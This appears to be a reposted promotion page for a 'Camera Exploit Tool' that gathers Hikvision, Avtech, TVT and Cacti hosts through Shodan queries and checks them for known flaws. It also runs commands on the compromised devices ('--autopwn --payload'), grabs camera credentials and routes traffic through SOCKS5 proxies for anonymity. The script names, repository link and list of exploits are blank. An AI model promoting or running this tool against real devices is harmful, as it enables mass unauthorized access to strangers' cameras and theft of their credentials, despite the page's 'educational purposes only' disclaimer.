Camera Exploit Tool Scanner to Exploit Cameras on the Internet
Camera Exploit Tool Scanner to Exploit Cameras on the Internet

Camera Exploit Tool: Scanner to Exploit Cameras on the Internet

This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing

You can discover thousands of vulnerable cameras using it.

Using Camera Exploit Tool
Using Camera Exploit Tool
Getting exploit camera Internet
Getting exploit camera Internet
Exploited IP camera
Exploited IP camera

Vendors Affected

[+] Hikvision

[+] Avtech

[+] TVT

[+] Cacti

more to come…


  • Fetching of hosts from
  • Check for vulnerable cameras
  • Automatically run commands on exploited devices (Only Hikvision for now)
  • Automatically grab camera credentials (Only for Avtech)
  • Multi-threading for faster scanning
  • Usage of Socks5 proxies for anonymity
  • Storing results in Sqlite3 database
  • Logging all actions in log files


To use this tool you need to have the following:

  • Shodan API key (Membership required for more than 1 page)
  • Socks5 authenticated proxies


It is as easy as typing the following commands.

git clone
pip install -r requirements.txt
python3 --help


Collect hosts in database

# Collect Hikvision hosts
python3 --shodan --api-token <shodan_token> --query 'product:"Hikvision IP Camera"' --pages 1

# Collect Avtech hosts
python3 --shodan --api-token <shodan_token> --query 'linux upnp avtech' --pages 1

# Collect TVT hosts
python3 --shodan --api-token <shodan_token> --query 'product:"Cross Web Server"' --pages 1

# Collect Cacti hosts
python3 --shodan --api-token <shodan_token> --query 'Login to Cacti' --pages 1

Check hosts for exploit

python3 --check --proxy-file proxies.txt --threads 20

Automatically run command on exploited hosts

python3 --autopwn --proxy-file proxies.txt --payload "id"


This tool is purely educational and is inteded to make the internet more secure

I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Exploits Used



Github Repo Here.